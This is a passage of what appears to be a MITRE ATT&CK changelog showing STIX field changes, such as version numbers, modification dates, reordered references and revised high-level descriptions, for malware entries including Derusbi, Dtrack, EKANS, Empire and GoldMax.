| external_references[2]['url'] | https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware | https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ |
| external_references[3]['source_name'] | CarbonBlack Conti July 2020 | Cybleinc Conti January 2020 |
| external_references[3]['description'] | Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021. | Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021. |
| external_references[3]['url'] | https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ | https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/ |
| external_references[4]['source_name'] | Cybleinc Conti January 2020 | Cybereason Conti Jan 2021 |
| external_references[4]['description'] | Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021. | Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021. |
| external_references[4]['url'] | https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/ | https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware |
| x_mitre_version | 1.1 | 2.1 |
| Description |
|---|
| [CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:10:53.785000+00:00 | 2022-10-05 16:34:18.865000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 18:54:53.268000+00:00 | 2022-09-22 18:16:11.378000+00:00 |
| external_references[2]['source_name'] | Proofpoint Operation Transparent Tribe March 2016 | Kaspersky Transparent Tribe August 2020 |
| external_references[2]['description'] | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. | Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021. |
| external_references[2]['url'] | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf | https://securelist.com/transparent-tribe-part-1/98127/ |
| external_references[3]['source_name'] | Kaspersky Transparent Tribe August 2020 | Proofpoint Operation Transparent Tribe March 2016 |
| external_references[3]['description'] | Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021. | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. |
| external_references[3]['url'] | https://securelist.com/transparent-tribe-part-1/98127/ | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo) | [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:59:10.146000+00:00 | 2022-04-15 15:04:10.654000+00:00 |
| description | [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo) | [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo) |
| external_references[1]['source_name'] | Derusbi | PHOTO |
| external_references[1]['description'] | (Citation: Novetta-Axiom) | (Citation: FireEye Periscope March 2018) |
| external_references[2]['source_name'] | PHOTO | Derusbi |
| external_references[2]['description'] | (Citation: FireEye Periscope March 2018) | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | Novetta-Axiom | Fidelis Turbo |
| external_references[3]['description'] | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. | Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016. |
| external_references[3]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf |
| external_references[4]['source_name'] | ThreatConnect Anthem | FireEye Periscope March 2018 |
| external_references[4]['description'] | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. |
| external_references[4]['url'] | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html |
| external_references[5]['source_name'] | Fidelis Turbo | Novetta-Axiom |
| external_references[5]['description'] | Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016. | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. |
| external_references[5]['url'] | https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf |
| external_references[6]['source_name'] | FireEye Periscope March 2018 | ThreatConnect Anthem |
| external_references[6]['description'] | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. |
| external_references[6]['url'] | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 00:05:45.283000+00:00 | 2022-10-18 22:01:45.646000+00:00 |
| external_references[1]['source_name'] | Kaspersky Dtrack | ZDNet Dtrack |
| external_references[1]['description'] | Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021. | Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021. |
| external_references[1]['url'] | https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers | https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/ |
| external_references[2]['source_name'] | Securelist Dtrack | Dragos WASSONITE |
| external_references[2]['description'] | Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021. | Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021. |
| external_references[2]['url'] | https://securelist.com/my-name-is-dtrack/93338/ | https://www.dragos.com/threat/wassonite/ |
| external_references[3]['source_name'] | Dragos WASSONITE | CyberBit Dtrack |
| external_references[3]['description'] | Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021. | Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021. |
| external_references[3]['url'] | https://www.dragos.com/threat/wassonite/ | https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ |
| external_references[4]['source_name'] | CyberBit Dtrack | Kaspersky Dtrack |
| external_references[4]['description'] | Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021. | Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021. |
| external_references[4]['url'] | https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ | https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers |
| external_references[5]['source_name'] | ZDNet Dtrack | Securelist Dtrack |
| external_references[5]['description'] | Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021. | Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021. |
| external_references[5]['url'] | https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/ | https://securelist.com/my-name-is-dtrack/93338/ |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:07:19.052000+00:00 | 2022-04-25 14:00:00.188000+00:00 |
| Old Description | New Description |
|---|---|
| [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) | [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 21:54:51.532000+00:00 | 2022-05-11 14:00:00.188000+00:00 |
| description | [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) | [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) |
| external_references[4]['description'] | Hinchliffe, A. Santos, D.. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021. | Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021. |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| [ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:21:32.420000+00:00 | 2022-07-26 23:33:26.355000+00:00 |
| external_references[1]['description'] | Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. | Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html | https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html |
| Description |
|---|
| [EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 18:17:43.966000+00:00 | 2022-01-19 18:23:52.922000+00:00 |
| external_references[3]['description'] | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved January 28, 2021. | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021. |
| external_references[3]['url'] | https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html | https://www.prevailion.com/phantom-in-the-command-shell-2/ |
| Description |
|---|
| [Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-11 14:58:57.587000+00:00 | 2022-06-03 17:55:43.889000+00:00 |
| external_references[3]['source_name'] | NCSC Joint Report Public Tools | Github PowerShell Empire |
| external_references[3]['description'] | The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019. | Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. |
| external_references[3]['url'] | https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools | https://github.com/PowerShellEmpire/Empire |
| external_references[4]['source_name'] | Github PowerShell Empire | GitHub ATTACK Empire |
| external_references[4]['description'] | Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. | Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019. |
| external_references[4]['url'] | https://github.com/EmpireProject/Empire | https://github.com/dstepanic/attck_empire |
| external_references[5]['source_name'] | GitHub ATTACK Empire | NCSC Joint Report Public Tools |
| external_references[5]['description'] | Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019. | The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019. |
| external_references[5]['url'] | https://github.com/dstepanic/attck_empire | https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools |
| x_mitre_version | 1.3 | 1.5 |
| Description |
|---|
| [FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'mobile-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 15:32:08.360000+00:00 | 2022-03-02 15:47:13.329000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
| Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) | [Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:41:41.805000+00:00 | 2022-10-12 17:51:18.408000+00:00 |
| description | Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) | [Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) |
| external_references[2]['source_name'] | Flamer | sKyWIper |
| external_references[2]['description'] | (Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice) | (Citation: Kaspersky Flame) (Citation: Crysys Skywiper) |
| external_references[3]['source_name'] | sKyWIper | Flamer |
| external_references[3]['description'] | (Citation: Kaspersky Flame) (Citation: Crysys Skywiper) | (Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice) |
| external_references[5]['source_name'] | Symantec Beetlejuice | Crysys Skywiper |
| external_references[5]['description'] | Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017. | sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018. |
| external_references[5]['url'] | https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache | https://www.crysys.hu/publications/files/skywiper.pdf |
| external_references[6]['source_name'] | Crysys Skywiper | Symantec Beetlejuice |
| external_references[6]['description'] | sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018. | Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017. |
| external_references[6]['url'] | https://www.crysys.hu/publications/files/skywiper.pdf | https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache |
| Description |
|---|
| [FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 23:52:23.647000+00:00 | 2022-07-18 15:59:26.387000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-21 23:09:31.063000+00:00 | 2022-04-11 21:45:35.889000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 22:52:42.023000+00:00 | 2022-04-15 22:23:36.883000+00:00 |
| description | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| external_references[1]['source_name'] | GoldMax | SUNSHUTTLE |
| external_references[1]['description'] | (Citation: MSTIC NOBELIUM Mar 2021) | (Citation: FireEye SUNSHUTTLE Mar 2021) |
| external_references[2]['source_name'] | SUNSHUTTLE | GoldMax |
| external_references[2]['description'] | (Citation: FireEye SUNSHUTTLE Mar 2021) | (Citation: MSTIC NOBELIUM Mar 2021) |
| external_references[3]['source_name'] | MSTIC NOBELIUM Mar 2021 | CrowdStrike StellarParticle January 2022 |
| external_references[3]['description'] | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. | CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. |
| external_references[3]['url'] | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ | https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ |
| external_references[4]['source_name'] | FireEye SUNSHUTTLE Mar 2021 | MSTIC NOBELIUM Mar 2021 |
| external_references[4]['description'] | Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021. | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'FireEye SUNSHUTTLE Mar 2021', 'description': 'Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html'} | |
| x_mitre_platforms | Linux |
| Description |
|---|
| [Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-29 21:37:55.776000+00:00 | 2022-07-11 20:35:28.082000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
